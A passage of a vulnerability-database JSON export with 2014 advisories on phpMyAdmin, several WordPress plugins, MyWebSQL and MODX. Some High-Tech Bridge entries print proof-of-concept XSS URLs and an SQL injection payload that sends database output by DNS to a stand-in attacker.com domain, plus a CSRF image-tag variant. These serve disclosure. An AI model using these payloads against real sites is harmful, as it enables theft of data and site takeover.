"cpe:2.3:a:mantisbt:mantisbt:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.10:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2022-01-17T19:07:00", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases.\n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote authenticated attacker could exploit these vulnerabilities to include and execute arbitrary local files via a crafted parameter, inject SQL code, or to conduct Cross-Site Scripting attacks. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.2.13\"\n \n\nAll phpMyAdmin 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.1.14.7\"\n \n\nAll phpMyAdmin 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.0.10.6\"", "cvss3": {}, "published": "2015-05-31T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986", "CVE-2014-4987", "CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-8961"], "modified": "2016-05-14T00:00:00", "id": "GLSA-201505-03", "href": "https://security.gentoo.org/glsa/201505-03", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:47:47", "description": "Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the \"gce_feed_ids\" parameter in a gce_ajax action to wp-admin/admin-ajax.php. \n\n## Solution\n\n\r\n Update the plugin. 
\r\n ", "cvss3": {}, "published": "2014-09-22T00:00:00", "type": "patchstack", "title": "WordPress Google Calendar Events Plugin <= 2.0.3 - XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2014-09-22T00:00:00", "id": "PATCHSTACK:D50E19BFB95A76A6DFABEA1CD209D2D4", "href": "https://patchstack.com/database/vulnerability/google-calendar-events/wordpress-google-calendar-events-plugin-2-0-3-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:46", "description": "Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the \"form\" or \"enc\" parameter.\n\n## Solution\n\n\r\n Update the plugin. 
\r\n ", "cvss3": {}, "published": "2014-09-22T00:00:00", "type": "patchstack", "title": "WordPress Contact Form DB Plugin <= 2.8.15 - Multiple XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2014-09-22T00:00:00", "id": "PATCHSTACK:96DBFDD4BB41FE75A97EB16B59946C00", "href": "https://patchstack.com/database/vulnerability/contact-form-db/wordpress-contact-form-db-plugin-2-8-15-multiple-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:50", "description": "Because of these vulnerabilities, the attackers can inject arbitrary web script or HTML via the \"callback\", \"dir\", or \"extensions\" parameters.\n\n## Solution\n\n\r\n Update the plugin. 
\r\n ", "cvss3": {}, "published": "2014-09-11T00:00:00", "type": "patchstack", "title": "WordPress Web-Dorado Photo Gallery Plugin <= 1.1.30 - Multiple XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2014-09-11T00:00:00", "id": "PATCHSTACK:4943C5B29626925DFE7EDD92FD51BCDE", "href": "https://patchstack.com/database/vulnerability/photo-gallery/wordpress-web-dorado-photo-gallery-plugin-1-1-30-multiple-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-01T19:47:45", "description": "This WordPress All In One WP Security plugin is prone to an SQL injection. This vulnerability allows an attacker to modify data, compromise the access and application or exploit hidden vulnerabilities in the underlying database. \n\n## Solution\n\n\r\n Update the plugin. 
\r\n ", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "patchstack", "title": "WordPress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "PATCHSTACK:2712576DDEC94C81E6ED1EF8328A8F4B", "href": "https://patchstack.com/database/vulnerability/all-in-one-event-calendar1/wordpress-all-in-one-security-plugin-3-8-2-sql-injection", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-01T19:47:53", "description": "Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the \"error\" parameter in the ewww-image-optimizer.php page to wp-admin/options-general.php.\n\n## Solution\n\n\r\n Update the plugin. 
\r\n ", "cvss3": {}, "published": "2014-09-04T00:00:00", "type": "patchstack", "title": "WordPress EWWW Image Optimizer Plugin <= 2.0.1 - XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2014-09-04T00:00:00", "id": "PATCHSTACK:162BA16548FF5D9112FB6F4962DD6498", "href": "https://patchstack.com/database/vulnerability/ewww-image-optimizer/wordpress-ewww-image-optimizer-plugin-2-0-1-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "htbridge": [{"lastseen": "2020-12-24T11:23:40", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_f eed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2014-10-07T00:00:00", "id": "HTB23235", "href": "https://www.htbridge.com/advisory/HTB23235", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:23:36", "description": "High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%2 2%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22 %29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Two XSS in Contact Form DB WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2014-09-26T00:00:00", "id": "HTB23233", "href": "https://www.htbridge.com/advisory/HTB23233", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:43", "description": "High-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. 
\n \n \n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb /%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29; %3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550& extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/scri pt%3E \n \n\n", "edition": 2, "published": "2014-09-10T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2014-09-10T00:00:00", "id": "HTB23232", "href": "https://www.htbridge.com/advisory/HTB23232", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:48", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. 
\n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Eal ert%28%27immuniweb%27%29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-06-25T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MyWebSQL", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4735"], "modified": "2014-06-25T00:00:00", "id": "HTB23221", "href": "https://www.htbridge.com/advisory/HTB23221", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:12:45", "description": "High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20l oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,C HAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899% 29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR% 28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%2 9,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20 load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29, CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899 %29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR %28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111% 29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28sele ct%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%2 9%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR %2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29 ,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%2 8111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\n", "edition": 2, "published": "2014-09-03T00:00:00", "type": "htbridge", "title": "Two SQL Injections in All In One WP Security WordPress plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-18T00:00:00", "id": "HTB23231", "href": "https://www.htbridge.com/advisory/HTB23231", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:12:47", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;% 22%3E\n", "edition": 2, "published": "2014-08-20T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in MODX Revolution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5451"], "modified": "2014-09-16T00:00:00", "id": "HTB23229", "href": "https://www.htbridge.com/advisory/HTB23229", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2020-12-24T11:23:30", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243 \n \nInput passed via the \"page\" HTTP GET parameter to \"/wp-admin/options-general.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww -image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie %29;%3C/script%3E \n \n\n", "edition": 2, "published": "2014-09-17T00:00:00", "type": "htbridge", "title": "Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2014-09-25T00:00:00", "id": "HTB23234", "href": "https://www.htbridge.com/advisory/HTB23234", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:31:01", "bulletinFamily": "software", "cvelist": ["CVE-2014-7138"], "description": "The Simple Calendar \u2013 Google Calendar Plugin WordPress plugin was affected by a XSS security vulnerability.\n", "modified": "2019-11-27T23:23:45", "published": "2014-10-08T00:00:00", "id": "WPVDB-ID:FDA9876C-3A05-42F6-9BF8-92B2E40715C2", "href": "https://wpscan.com/vulnerability/fda9876c-3a05-42f6-9bf8-92b2e40715c2", "type": "wpvulndb", "title": "Google Calendar Events < 2.0.4 - XSS", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:34:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-7139"], "description": "The contact-form-7-to-database-extension WordPress plugin was affected by a 2 x Cross-Site Scripting (XSS) security 
vulnerability.\n", "modified": "2019-10-21T12:08:19", "published": "2014-10-09T11:38:40", "id": "WPVDB-ID:6BED0047-0F82-40D7-876F-88BF363AA55C", "href": "https://wpscan.com/vulnerability/6bed0047-0f82-40d7-876f-88bf363aa55c", "type": "wpvulndb", "title": "Contact Form DB 2.8.13 - 2 x Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:20:00", "bulletinFamily": "software", "cvelist": ["CVE-2014-6315"], "description": "The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery WordPress plugin was affected by a Cross Site Scripting security vulnerability.\n", "modified": "2019-10-21T12:49:31", "published": "2014-10-01T00:00:00", "id": "WPVDB-ID:9285F0B4-1E9F-49D6-A831-4B9F0F0C40A2", "href": "https://wpscan.com/vulnerability/9285f0b4-1e9f-49d6-a831-4b9f0f0c40a2", "type": "wpvulndb", "title": "Photo Gallery 1.1.30 - Cross Site Scripting", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-15T22:08:29", "bulletinFamily": "software", "cvelist": ["CVE-2014-6242"], "description": "The All In One WP Security & Firewall WordPress plugin was affected by a 2xSQL Injections security vulnerability.\n", "modified": "2019-10-21T12:00:27", "published": "2014-09-26T20:53:31", "id": "WPVDB-ID:5398C513-15C7-40EF-8E77-DDCB73174956", "href": "https://wpscan.com/vulnerability/5398c513-15c7-40ef-8e77-ddcb73174956", "type": "wpvulndb", "title": "All In One WP Security plugin 3.8.2 - 2xSQL Injections", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-15T22:20:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-6243"], "description": "The EWWW Image Optimizer WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability.\n", "modified": "2019-10-21T12:09:10", "published": "2014-10-09T11:35:03", "id": "WPVDB-ID:17401705-5F44-47D6-920E-EC058D426114", "href": 
